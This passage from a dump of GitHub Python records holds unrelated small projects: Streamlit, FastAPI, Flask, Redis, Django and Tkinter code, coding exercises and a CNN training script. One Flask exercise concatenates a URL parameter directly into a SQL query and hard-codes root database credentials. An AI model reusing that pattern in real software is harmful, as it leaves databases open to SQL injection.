model*\")\noption1_text = \"Use an example image\"\noption2_text = \"Upload a custom image for analysis\"\noption = st.radio(\"Choose a method to load an image:\", [option1_text, option2_text])\n\nif option == option1_text:\n working_dir = os.path.join(os.getcwd(), \"test_images\")\n test_images = natsorted(\n [\n f\n for f in os.listdir(working_dir)\n if os.path.isfile(os.path.join(working_dir, f))\n ]\n )\n test_image = st.selectbox(\"Please select a test image:\", test_images)\n\n if st.button(\"Analyze!\"):\n file_path = os.path.join(working_dir, test_image)\n img = skimage.io.imread(file_path)\n img = resize(img, (256, 256))\n\n predict(img, file_path, want_adv)\nelse:\n image_file = st.file_uploader(\"Upload Image\", type=[\"png\", \"jpeg\", \"jpg\"])\n if st.button(\"Analyze!\"):\n if image_file is not None:\n file_details = {\n \"Filename\": image_file.name,\n \"FileType\": image_file.type,\n \"FileSize\": image_file.size,\n }\n base_img = load_image(image_file)\n img = base_img.resize((256, 256))\n img = img.convert(\"RGB\")\n predict(img, img, want_adv)\nst.markdown(\"---\")\nst.subheader(\"How it Works:\")\nst.markdown(\n \"**GeoGrip** uses Convolutional Neural Network (CNN) trained on a labeled dataset (\"\n \"approx. 3000 satellite images, each 256x256 in two classes) with two classes. More \"\n \"specifically, the primary model is MixNet-XL\"\n)\n","repo_name":"piyush-mk/GeoGrip","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21202126209","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\n Module :mod:``\n\n This Module is created to...\n\n LICENSE: The End User license agreement is located at the entry level.\n\n\"\"\"\n\n# ----------- START: Native Imports ---------- #\nimport os\n# ----------- END: Native Imports ---------- #\n\n# ----------- START: Third Party Imports ---------- #\n# ----------- END: Third Party Imports ---------- #\n\n# ----------- START: In-App Imports ---------- #\nfrom core.utils.environ import get_build_path\n# ----------- END: In-App Imports ---------- #\n\nBUILD_PATH = get_build_path()\n\nPROJECT_HOME = 'core'\n\nSTATIC_FILE_ROOT_PATH = \"src/core.backend/core/backend/static\"\n\nSTATIC_JS_FILE_PATH = \"{}/js\".format(STATIC_FILE_ROOT_PATH)\nSTATIC_CSS_FILE_PATH = \"{}/css\".format(STATIC_FILE_ROOT_PATH)\nSTATIC_VIEW_FILE_PATH = \"{}/htmls\".format(STATIC_FILE_ROOT_PATH)\nSTATIC_IMAGE_FILE_PATH = \"{}/images\".format(STATIC_FILE_ROOT_PATH)\nSTATIC_FONT_FILE_PATH = \"{}/fonts\".format(STATIC_FILE_ROOT_PATH)\n\nCONFIG_FILE_ROOT_PATH = os.path.join(BUILD_PATH, 'ini')\n\nRULES_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, \"rules.ini\")\nMASTER_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, \"master.ini\")\nCLIENT_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, \"client.ini\")\nCLIENT_TEMPLATE_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, \"client_tpl.ini\")\nNODE_TEMPLATE_CONFIG_FILE = os.path.join(CONFIG_FILE_ROOT_PATH, \"node_tpl.ini\")\n","repo_name":"SivaCn/core.backend","sub_path":"core/backend/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22001537882","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.30'\n\nsetup(name='Twister',\n version=version,\n description=\"Twitter Streaming Server\",\n long_description=\"\"\"\\\nTwitter Streaming Server\"\"\",\n classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n keywords='python twitter',\n author='Jun Kimura',\n author_email='jksmphone@gmail.com',\n url='',\n license='MIT',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n # -*- Extra requirements: -*-\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","repo_name":"bluele/Twister","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23595930308","text":"\"\"\"\n demonstrate use of Redis\n\"\"\"\n\n\nimport login_database\nimport utilities\n\n\ndef run_example():\n \"\"\"\n uses non-presistent Redis only (as a cache)\n\n \"\"\"\n\n log = utilities.configure_logger('default', '../logs/redis_script.log')\n\n try:\n log.info('Step 1: connect to Redis')\n r = login_database.login_redis_cloud()\n\n log.info('Step 2: cache some data in Redis')\n #r.set('andy', 'andy@somewhere.com')\n\n r.rpush('customer1', 'sirisha', '206-111-1111', '98111')\n r.rpush('customer2', 'jessy', '206-222-2222', '98129')\n r.rpush('customer3', 'david', '206-333-3333', '98127')\n r.rpush('customer4', 'sam', '425-111-2222', '98052')\n r.rpush('customer5', 'alex', '425-222-3333', '98007')\n r.rpush('customer6', 'bill', '425-333-4444', '98006')\n\n print(f\"Length of list for customer1 is: {r.llen('customer1')}\")\n print(f\"Database size: {r.dbsize()}\")\n print(f\"customer1 name:{r.lindex('customer1', 0)}\")\n print(f\"customer1 telephone: {r.lindex('zip',1)}\")\n print(f\"customer1 zip: {r.lindex('customer1', 2)}\")\n\n except Exception as e:\n print(f'Redis error: {e}')\n\n\nif __name__ ==\"__main__\":\n run_example()\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/msirisha/lesson08/activity/src/redis_script.py","file_name":"redis_script.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7122975621","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: is_valid_ext.py\n\n Description: Unit testing of is_valid_ext in rmq_2_isse.py.\n\n Usage:\n test/unit/rmq_2_isse/is_valid_ext.py\n\n Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport os\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\n# Third-party\nimport mock\n\n# Local\nsys.path.append(os.getcwd())\nimport rmq_2_isse\nimport version\n\n__version__ = version.__version__\n\n\nclass UnitTest(unittest.TestCase):\n\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp -> Initialize testing environment.\n test_is_valid_ext_empty_set -> Test with empty ignore set.\n test_is_valid_ext_not_fnd -> Test with no find in set.\n test_is_valid_ext_fnd -> Test with one find in set.\n tearDown -> Clean up of testing environment.\n\n \"\"\"\n\n def setUp(self):\n\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n\n class CfgTest(object):\n\n \"\"\"Class: CfgTest\n\n Description: Class which is a representation of a cfg module.\n\n Methods:\n __init__ -> Initialize configuration environment.\n\n \"\"\"\n\n def __init__(self):\n\n \"\"\"Method: __init__\n\n Description: Initialization instance of the CfgTest class.\n\n Arguments:\n\n \"\"\"\n\n self.ignore_ext = [\"_kmz.64.txt\", \"_pptx.64.txt\"]\n\n self.ct = CfgTest()\n\n self.fname = \"File1_kmz.64.txt\"\n\n @mock.patch(\"rmq_2_isse.gen_class.Logger\")\n def test_is_valid_ext_empty_set(self, mock_log):\n\n \"\"\"Function: test_is_valid_ext_empty_set\n\n Description: Test is_valid_ext function with empty ignore set.\n\n Arguments:\n\n \"\"\"\n\n mock_log.return_value = True\n\n self.ct.ignore_ext = []\n\n self.assertTrue(rmq_2_isse.is_valid_ext(self.fname, self.ct, mock_log))\n\n @mock.patch(\"rmq_2_isse.gen_class.Logger\")\n def test_is_valid_ext_not_fnd(self, mock_log):\n\n \"\"\"Function: test_is_valid_ext_not_fnd\n\n Description: Test is_valid_ext function with not found in set.\n\n Arguments:\n\n \"\"\"\n\n mock_log.return_value = True\n\n self.fname = \"File1.txt\"\n\n self.assertTrue(rmq_2_isse.is_valid_ext(self.fname, self.ct, mock_log))\n\n @mock.patch(\"rmq_2_isse.gen_class.Logger\")\n def test_is_valid_ext_fnd(self, mock_log):\n\n \"\"\"Function: test_is_valid_ext_fnd\n\n Description: Test is_valid_ext function with one find in set.\n\n Arguments:\n\n \"\"\"\n\n mock_log.return_value = True\n\n self.assertFalse(rmq_2_isse.is_valid_ext(self.fname,\n self.ct, mock_log))\n\n def tearDown(self):\n\n \"\"\"Function: tearDown\n\n Description: Clean up of unit testing.\n\n Arguments:\n\n \"\"\"\n\n self.ct = None\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mjpernot/rabbitmq-isse","sub_path":"test/unit/rmq_2_isse/is_valid_ext.py","file_name":"is_valid_ext.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34824243328","text":"# Full path and name to your csv file\ncsv_filepathname=\"/home/samuel/Documents/Django/projects/wawa/zip/zip.csv\"\n# Full path to your django project directory\nyour_djangoproject_home=\"/home/samuel/Documents/Django/projects/wawa\"\n \nimport sys,os\nsys.path.append(your_djangoproject_home)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'settings'\n \nfrom trotro.models import ZipCode\n \nimport csv\ndataReader = csv.reader(open(csv_filepathname), delimiter=',', quotechar='\"')\n \nfor row in dataReader:\n if row[0] != 'ZIPCODE': # Ignore the header row, import everything else\n zipcode = ZipCode()\n zipcode.zipcode = row[0]\n zipcode.city = row[1]\n zipcode.statecode = row[2]\n zipcode.statename = row[3]\n zipcode.save()\n","repo_name":"aiti-ghana-2012/TroApp","sub_path":"wawa/zip/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70256101226","text":"taqueria_menu = {\n \"Baja Taco\": 4.00,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n}\n\n\ndef main():\n total = 0\n while True:\n try:\n total += get_itens()\n except KeyError:\n pass\n except EOFError:\n print(\"\\n\")\n break\n else:\n print(f\"Total: ${total:.2f}\")\n\n\n\ndef get_itens():\n item = input(\"Item: \").title()\n if item in taqueria_menu:\n return taqueria_menu.get(item)\n else:\n raise KeyError\n\nmain()","repo_name":"jessicamosouza/cs50-python","sub_path":"pset3/taqueria/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29387040476","text":"\"\"\"Module containing API router for tensor\ntrigger functionality\"\"\"\n\nimport logging\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends, status\nfrom fastapi.encoders import jsonable_encoder as je\nfrom fastapi.responses import JSONResponse\n\nfrom src.utils import json_response_with_message, get_user, \\\n generate_base64_file, Base64FileMetadata, parse_base64_file\nfrom src.persistence.postgres import get_user_model, get_user_models, \\\n insert_user_model, delete_user_model\nfrom src.persistence.s3 import upload_s3_file, retrieve_s3_file, \\\n delete_s3_file\nfrom src.config import PG_CREDENTIALS\nfrom src.models.models import ModelUploadRequest\nfrom src.logic.tensor import validate_upload_content\n\n\nLOGGER = logging.getLogger(__name__)\nROUTER = APIRouter()\n\n@ROUTER.get('')\nasync def get_models_handler(uid: str = Depends(get_user())) -> JSONResponse:\n \"\"\"API handler used to retrieve models\n for a given user\n\n Returns:\n JSONResponse: [description]\n \"\"\"\n\n LOGGER.debug('retrieving models for user %s', uid)\n # get all models from postgres database and convert to dict\n models = [m._asdict() for m in get_user_models(PG_CREDENTIALS, uid)]\n content = {'http_code': status.HTTP_200_OK,\n 'models': models}\n return JSONResponse(status_code=status.HTTP_200_OK, content=je(content))\n\n\n@ROUTER.get('/{model_id}/content')\nasync def get_model_handler(model_id: UUID, uid: str = Depends(get_user())) -> JSONResponse:\n \"\"\"API handler used to retrieve model by\n model ID for a given user\n\n Returns:\n JSONResponse: [description]\n \"\"\"\n\n LOGGER.debug('retrieving model %s for user %s', model_id, uid)\n model_meta = get_user_model(PG_CREDENTIALS, uid, model_id)\n if model_meta is None:\n return json_response_with_message(status.HTTP_404_NOT_FOUND, 'Cannot find specified model')\n\n s3_data = retrieve_s3_file('/tensor-trigger/' + str(model_id))\n # generate metadata for file (including mime type) and convert to\n # base64 encoded format\n meta = Base64FileMetadata(file_size=0, mime_type='application/octet-stream')\n content = {'http_code': status.HTTP_200_OK,\n 'model': generate_base64_file(s3_data, meta)}\n return JSONResponse(status_code=status.HTTP_200_OK, content=je(content))\n\n\n@ROUTER.get('/{model_id}/metadata')\nasync def get_model_meta_handler(model_id: UUID, uid: str = Depends(get_user())) -> JSONResponse:\n \"\"\"API handler used to retrieve model by\n model ID for a given user\n\n Returns:\n JSONResponse: [description]\n \"\"\"\n\n LOGGER.debug('retrieving model %s for user %s', model_id, uid)\n model_meta = get_user_model(PG_CREDENTIALS, uid, model_id)\n if model_meta is None:\n return json_response_with_message(status.HTTP_404_NOT_FOUND, 'Cannot find specified model')\n\n content = {'http_code': status.HTTP_200_OK,\n 'model': model_meta._asdict()}\n return JSONResponse(status_code=status.HTTP_200_OK, content=je(content))\n\n\n@ROUTER.post('/new')\nasync def new_model_handler(r: ModelUploadRequest, uid: str = Depends(get_user())) -> JSONResponse:\n \"\"\"API handler used to retrieve model by\n model ID for a given user\n\n Returns:\n JSONResponse: [description]\n \"\"\"\n\n LOGGER.debug('received request to upload new model for user %s', uid)\n # insert into postgres database and retrieve model ID\n try:\n meta, bytes_data = parse_base64_file(r.model_content)\n # try to parse uploaded content to tensorflow model\n expected_shapes = validate_upload_content(bytes_data, r.model_schema)\n bytes_data.seek(0)\n except Exception:\n LOGGER.exception('unable to parse file')\n return json_response_with_message(status.HTTP_400_BAD_REQUEST, 'Invalid model data')\n\n model_id = insert_user_model(PG_CREDENTIALS,\n uid,\n r.model_name,\n r.model_description,\n r.model_schema,\n meta.file_size,\n expected_shapes.input_shape,\n expected_shapes.output_shape)\n # upload data to s3 bucket\n upload_s3_file(bytes_data, '/tensor-trigger/' + str(model_id))\n return json_response_with_message(status.HTTP_201_CREATED, 'Successfully created model')\n\n\n@ROUTER.delete('/{model_id}')\nasync def delete_model_handler(model_id: UUID, uid: str = Depends(get_user())) -> JSONResponse:\n \"\"\"API handler used to delete model\n\n Args:\n model_id (UUID): [description]\n uid (str, optional): [description]. Defaults to Depends(get_user()).\n\n Returns:\n JSONResponse: [description]\n \"\"\"\n\n LOGGER.debug('deleting model %s for user %s', model_id, uid)\n model_meta = get_user_model(PG_CREDENTIALS, uid, model_id)\n if model_meta is None:\n return json_response_with_message(status.HTTP_404_NOT_FOUND, 'Cannot find specified model')\n\n # delete model from S3 bucket and from postgres database\n delete_s3_file('/tensor-trigger/' + str(model_id))\n delete_user_model(PG_CREDENTIALS, uid, model_id)\n\n content = {'http_code': status.HTTP_200_OK,\n 'message': 'Successfully deleted model'}\n return JSONResponse(status_code=status.HTTP_200_OK, content=content)\n","repo_name":"PSauerborn/tensor-trigger","sub_path":"app/src/routers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13366172353","text":"# 문제 설명\n# 두 개의 단어 begin, target과 단어의 집합 words가 있습니다. 아래와 같은 규칙을 이용하여 begin에서 target으로 변환하는 가장 짧은 변환 과정을 찾으려고 합니다.\n# 1. 한 번에 한 개의 알파벳만 바꿀 수 있습니다.\n# 2. words에 있는 단어로만 변환할 수 있습니다.\n# 예를 들어 begin이 hit, target가 cog, words가 [hot,dot,dog,lot,log,cog]라면 hit -> hot -> dot -> dog -> cog와 같이 4단계를 거쳐 변환할 수 있습니다.\n# 두 개의 단어 begin, target과 단어의 집합 words가 매개변수로 주어질 때, 최소 몇 단계의 과정을 거쳐 begin을 target으로 변환할 수 있는지 return 하도록 solution 함수를 작성해주세요.\n\n# 제한사항\n# 각 단어는 알파벳 소문자로만 이루어져 있습니다.\n# 각 단어의 길이는 3 이상 10 이하이며 모든 단어의 길이는 같습니다.\n# words에는 3개 이상 50개 이하의 단어가 있으며 중복되는 단어는 없습니다.\n# begin과 target은 같지 않습니다.\n# 변환할 수 없는 경우에는 0를 return 합니다.\n\ndef solution(begin, target, words):\n # 가장 먼저 target 단어가 words 리스트에 없으면 바로 0을 반환하도록 합니다.\n if target not in words:\n return 0\n\n answer = 0\n # DFS에 사용할 stack에 시작 노드인 begin을 넣어줍니다.\n stack = [begin]\n # 이미 탐색한 단어를 다시 탐색하지 않도록 확인하기 위해 \n # visited라는 자료구조로 탐색 여부를 관리합니다.\n # 아직 탐색한 단어가 없으므로 전부 0으로 세팅해줍니다.\n visited = [0] * len(words)\n \n \n while stack:\n cur = stack.pop()\n if cur == target:\n return answer\n \n for i in range(len(words)):\n diffCnt = 0\n for j in range(len(cur)):\n if cur[j] != words[i][j]:\n diffCnt += 1\n\n if diffCnt == 1:\n if visited[i] == 0:\n visited[i] = 1\n stack.append(words[i])\n else:\n continue\n answer += 1\n\n return answer\n\n\n# test case 1\nprint(solution(\"hit\", \"cog\",[\"hot\", \"dot\", \"dog\", \"lot\", \"log\", \"cog\"] )) # 4\nprint()\n# test case 2\nprint(solution(\"hit\", \"cog\", [\"hot\", \"dot\", \"dog\", \"lot\", \"log\"])) #0\n","repo_name":"Seungyoonkim66/Programmers-Coding-Test","sub_path":"Python/DFS_BFS/단어 변환.py","file_name":"단어 변환.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1966181161","text":"'''\nWritten by Kenny William Nyallau ©2020\nThis is a python implementation of Rover challenge\n'''\nfrom rover import Rover\nfrom plateau import Plateau\nimport re\n\ndef main():\n\n print(\"---WELCOME TO ROVER SIMULATOR---\")\n rover = Rover()\n plateau = Plateau()\n\n rover.setRoverName()\n plateau.setPlateauSize()\n rover.setCoordinatesAndOrientation()\n rover.setInstruction()\n plateau.setRoverCoordinates(rover.x, rover.y)\n rover.setPlateauCoordinates(plateau.px, plateau.py)\n \n print(f\"{rover.name} is starting at x: {rover.x},y: {rover.y}, orientation: {rover.orientation}\")\n rover.moveRover()\n print(f\"{rover.name} has arrived at x: {rover.x},y: {rover.y}, orientation: {rover.orientation}\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"k3nnywilliam/rover-simulator","sub_path":"python_version/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17492438672","text":"import os\nimport json\n\nfrom alfanous import paths\nfrom alfanous.engines import QuranicSearchEngine, FuzzyQuranicSearchEngine\nfrom alfanous.engines import TraductionSearchEngine, WordSearchEngine\n\n\ndef recitations(path=paths.RECITATIONS_LIST_FILE):\n try:\n myfile = open(path)\n except IOError:\n return {}\n return json.loads(myfile.read()) if myfile else {}\n\n\ndef translations(path=paths.TRANSLATIONS_LIST_FILE):\n try:\n myfile = open(path)\n except IOError:\n return {}\n return json.loads(myfile.read()) if myfile else {}\n\n\ndef hints(path=paths.HINTS_FILE):\n myfile = open(path)\n return json.loads(myfile.read()) if myfile else {}\n\n\ndef stats(path=paths.STATS_FILE, ref_path=paths.STATS_REFERENCE_FILE):\n if os.path.exists(path):\n myfile = open(path)\n else:\n path_dirpart = os.path.dirname(path)\n if not os.path.exists(path_dirpart):\n os.makedirs(path_dirpart)\n\n ref_file = open(ref_path, \"r\")\n myfile = open(path, \"w+\")\n myfile.write(ref_file.read())\n myfile.seek(0)\n return json.loads(myfile.read()) if myfile else {}\n\n\ndef information(path=paths.INFORMATION_FILE):\n myfile = open(path)\n return json.loads(myfile.read()) if myfile else {}\n\n\ndef QSE(path=paths.QSE_INDEX):\n return QuranicSearchEngine(path)\n\n\ndef FQSE(path=paths.QSE_INDEX):\n return FuzzyQuranicSearchEngine(path)\n\n\ndef TSE(path=paths.TSE_INDEX):\n return TraductionSearchEngine(path)\n\n\ndef WSE(path=paths.WSE_INDEX):\n return WordSearchEngine(path)\n\n\ntry:\n from alfanous.dynamic_resources.arabicnames_dyn import ara2eng_names as Fields\nexcept:\n Fields = {}\ntry:\n from alfanous.dynamic_resources.std2uth_dyn import std2uth_words\nexcept:\n std2uth_words = {}\ntry:\n from alfanous.dynamic_resources.vocalizations_dyn import vocalization_dict\nexcept:\n vocalization_dict = {}\ntry:\n from alfanous.dynamic_resources.synonymes_dyn import syndict\nexcept:\n syndict = {}\ntry:\n from alfanous.dynamic_resources.derivations_dyn import derivedict\nexcept:\n derivedict = {\"root\": []}","repo_name":"Alfanous-team/alfanous","sub_path":"src/alfanous/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"37"} +{"seq_id":"11482787749","text":"import tkinter as tk\nimport time\nfrom threading import Thread, Condition\n\n# Globals\n_current_time = 30\n\n# Functions\ndef update_timer_loop(cv):\n global _current_time\n while True:\n cv.wait(1)\n if _current_time > 0:\n _current_time -= 1\n label.config(text = _current_time)\n else:\n break\n\ndef reset_countdown(cv):\n global _current_time\n _current_time = 30\n cv.notifyAll()\n\n# Main\nwindow = tk.Tk()\n\n# condition variable for thread sync\ncv = Condition()\n\ntimer_thread = Thread(target=update_timer_loop,args=[cv])\ntimer_thread.start()\n\n# label\nlabel = tk.Label(window, text = _current_time, font=(\"Luminari\", 36,\"bold italic\"))\nlabel.pack()\n\n# button\nbutton_image = tk.PhotoImage(file='/home/company/Downloads/IMG_3750.PNG')\nbutton = tk.Button(window, image=button_image, command=lambda: reset_countdown(cv))\nbutton.pack(pady=30)\n\nwindow.geometry(\"1600x1600\")\nwindow.mainloop()\ntimer_thread.join()\n","repo_name":"merekg/tinker","sub_path":"python/TkinterGUI/redButton.py","file_name":"redButton.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17231624497","text":"lists = ['Learn Pyhton','Learn Java','Go Swiming','Have dinner',\r\n 'Go to bed','exist']\r\nprint('Please Choose your option from the list below')\r\ni=1\r\nfor item in lists:\r\n print(str(i)+'. {}'.format(item))\r\n i += 1\r\nselect=int(input())\r\nprint('you selected {}'.format(lists[select - 1]))\r\n\r\n\r\n","repo_name":"Rupam-Shil/Python-Beginners-to-Pro","sub_path":"Projectflow/proj.py","file_name":"proj.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11087239315","text":"from typing import Optional\n\nfrom pydantic import BaseModel\n\nfrom modules.gacha.banner import GenshinBannerType, GachaBanner\nfrom modules.gacha.player.banner import PlayerGachaBannerInfo\n\n\nclass PlayerGachaInfo(BaseModel):\n \"\"\"玩家抽卡全部信息\"\"\"\n\n standard_banner: Optional[PlayerGachaBannerInfo] = None\n event_weapon_banner: Optional[PlayerGachaBannerInfo] = None\n event_character_banner: Optional[PlayerGachaBannerInfo] = None\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n if self.standard_banner is None:\n self.standard_banner = PlayerGachaBannerInfo()\n if self.event_weapon_banner is None:\n self.event_weapon_banner = PlayerGachaBannerInfo()\n if self.event_character_banner is None:\n self.event_character_banner = PlayerGachaBannerInfo()\n\n def get_banner_info(self, banner: GachaBanner) -> PlayerGachaBannerInfo:\n if banner.banner_type == GenshinBannerType.EVENT:\n return self.event_character_banner\n if banner.banner_type == GenshinBannerType.WEAPON:\n return self.event_weapon_banner\n return self.standard_banner\n","repo_name":"PaiGramTeam/PaiGram","sub_path":"modules/gacha/player/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"} +{"seq_id":"32775972415","text":"import argparse\nfrom typing import Union, List\n\nfrom src.Constants import Constants\n\n\nclass GeneralConfigArgumentsParser:\n def __init__(self):\n self.parser = argparse.ArgumentParser(description='Args parser for general parameters')\n self.parser.add_argument('--algo', type=str, help='Algorithm to be used', required=True,\n choices=Constants.ALGORITHMS.keys())\n self.parser.add_argument('--env', type=str, help='OpenAI Gym environment name', default=\"Humanoid-v2\")\n self.parser.add_argument('--eval_env', type=str, help='OpenAI Gym environment name', default=\"Humanoid-v2\")\n self.parser.add_argument('--num_parallel_envs', type=int, help='Number of CPU cores to use', required=True)\n self.parser.add_argument('--max_timesteps', type=int, help='Maximum number of timesteps', required=True)\n\n def parse_known_args(self, args: List[str] = None, namespace: Union[None, argparse.Namespace] = None):\n return self.parser.parse_known_args(args=args, namespace=namespace)\n\n\nclass CommonArgumentsParser:\n def __init__(self):\n self.parser = argparse.ArgumentParser(description='Args parser for common parameters for all algorithms')\n self.parser.add_argument('--gamma', type=float, help='Discount factor', required=False, default=0.99)\n self.parser.add_argument('--learning_rate', type=float, help='Learning rate', required=False,\n default=0.0003)\n self.parser.add_argument('--batch_size', type=int, help='Minibatch size for each gradient update', default=256)\n self.parser.add_argument('--net_arch', nargs='+', type=int, help='Network architecture for actor and critic',\n required=False, default=[256, 256])\n self.parser.add_argument('--activation_fn', type=str, help='Activation function used in hidden layers',\n default=\"relu\", choices=Constants.ACTIVATION_FUNCTIONS_MAPPING.keys())\n\n def parse_known_args(self, args: List[str] = None, namespace: Union[None, argparse.Namespace] = None):\n return self.parser.parse_known_args(args=args, namespace=namespace)\n","repo_name":"PKramek/stablebaseline3_runner","sub_path":"src/args_parser/common_args_parser.py","file_name":"common_args_parser.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36744276400","text":"from flask import Flask, request, Response\nimport json\nimport mysql.connector\n\n\nconnection = mysql.connector.connect(\n host='127.0.0.1',\n port= 3306,\n database='flight_game',\n user='root',\n password='root',\n autocommit=True\n)\n\n# 1 is the number prime\n\napp = Flask(__name__)\n\n\n@app.route('/prime_number/')\ndef prime_number(number):\n isPrime = True\n number = int(number)\n if number > 1:\n for i in range(2, number):\n if (number % i) == 0:\n isPrime = False\n break\n\n response = {\n \"isPrime\": isPrime,\n \"Number\": number\n }\n return response\n\n\nif __name__ == '__main__':\n app.run(use_reloader=True, host='127.0.0.1', port=5000)\n\n\n\n# 2 gives name and location \n\napp = Flask(__name__)\n\n\n@app.route('/airport/')\ndef airport(icao):\n sql = \"SELECT name, municipality FROM airport\"\n sql += \" WHERE ident='\" + icao + \"'\"\n cursor = connection.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n if cursor.rowcount > 0:\n for row in result:\n name = row[0]\n location = row[1]\n\n response = {\n \"Airport\" : name,\n \"Location\" : location,\n \"ICAO\" : icao\n }\n return response\n\n\nif __name__ == '__main__':\n app.run(use_reloader=True, host='127.0.0.1', port=5000)\n","repo_name":"kiianaaa/Software2_Exercises","sub_path":"Exercise-13.py","file_name":"Exercise-13.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35366894176","text":"\n\nimport time\nimport scipy.io\nimport os\nimport numpy as np\nimport theano\nimport theano.tensor as tensor\nimport theano.tensor.signal\nimport theano.tensor.signal.pool\n\nfrom cnn_classifier import init_params, init_tparams\nfrom cnn_classifier import build_model\nimport sklearn\nfrom sklearn import metrics\nimport optimizers\n\nfrom utils import get_minibatches_idx, Read_Autism_cross\nfrom utils import unzip, zipp\n\nSEED = 1101\ndef pred_error(f_pred, data, label):\n preds = f_pred(data)\n errs = (preds == label).sum().astype(theano.config.floatX)\n errs = 1. - errs/data.shape[0]\n errs = errs.astype(theano.config.floatX)\n return errs\n \ndef pred_error_all(f_pred, f_pred_prob, data, label):\n step = 2000.\n N,C,T = data.shape\n temp = f_pred_prob(data[0:1,:,:])\n pred = np.zeros((data.shape[0],))\n prob = np.zeros((data.shape[0],temp.shape[1]))\n for i in range(np.int32(np.ceil(data.shape[0]/step))):\n srt = np.int32(i * step)\n edn = np.int32(min((i+1) * step, data.shape[0]))\n pred[srt:edn] = f_pred(data[srt:edn,:,:])\n prob[srt:edn,:] = f_pred_prob(data[srt:edn,:,:])\n errs = (pred == label).sum().astype(theano.config.floatX)\n errs = 1. - errs/data.shape[0]\n errs = errs.astype(theano.config.floatX)\n return prob, pred, errs\n\n\"\"\" Training the model. \"\"\"\n\n\n\"\"\" used to calculate the prediction error. \"\"\"\n\nif __name__ == '__main__':\n # data is of size N x C x T\n # https://docs.python.org/2/howto/logging-cookbook.html\n Nt = 40\n K = 10\n batch_size = 200\n max_epochs = 40\n patience = 10\n lrate = 0.002\n valid_batch = 100\n dispFreq = 2\n validFreq = 10\n pool_size_cl = 40\n C = 60\n drop_rate = 0.2\n saveFreq = 100\n result_path = './Result_gpcnn_p' + str(drop_rate) + '_K_' + str(K) + '_Nt' + str(Nt) + '_C' + str(C) \n file_path = '/media/lyt/SSD/Autism/All_zscores_200/'\n if not os.path.exists(result_path):\n os.mkdir(result_path)\n for test_id in np.array([21]):\n if test_id == 4 or test_id == 7 or test_id == 22:\n continue\n train,val,test,labtrain,_,labval,labtest = Read_Autism_cross(file_path,[test_id + 1])\n _,C0,T = train.shape\n options = 